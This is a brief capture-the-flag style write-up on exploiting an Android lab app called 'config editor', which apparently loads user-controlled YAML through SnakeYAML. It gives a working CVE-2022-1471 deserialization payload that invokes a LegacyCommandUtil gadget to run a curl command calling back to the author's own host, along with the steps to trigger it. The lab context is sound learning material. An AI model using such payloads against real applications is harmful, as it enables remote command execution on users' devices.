config editor

after reverse engineering the app using jadx-gui i found out that the main activity is the only activity and it has 2 intents the main launcher intent and a browsable deeplink intent.

reading the java code i understood that the flow of the app it handles YAML configuration files using a third party called SnakeYAML.

searching SnakeYAML if found many blogs about the vulnerability cve-2022-1471.

the following blogs where great:

https://snyk.io/blog/unsafe-deserialization-snakeyaml-java-cve-2022-1471/
https://swapneildash.medium.com/snakeyaml-deserilization-exploited-b4a2c5ac0858

after reading about the CVE i understood the at we should have 2 things to exploit:

1- yaml.load(); that takes a user controlled input as an argument like

we have this in the loadYAML method in the main activity

2- a gadget chain that executes a given command when the constructor is called.

from a mobsf report i found this file path com/mobilehackinglab/configeditor/LegacyCommandUtil.java in the android api calls

exploitation

1- create exploit YAML file

!!gadget ["command"]

!!com.mobilehackinglab.configeditor.LegacyCommandUtil ["curl http:/192.168.1.142:8888 "]

the command between [] will make the android device on the same network send a get request to a python https server on my linux machine

2- move the file to the android device

3-run the http server and load the file in the app

python3 -m http.server 8888

and we get a get request from 192.168.1.5 the android device ip

PreviousGuess me Nextfood store

Last updated 8 months ago

hashtagexploitation

exploitation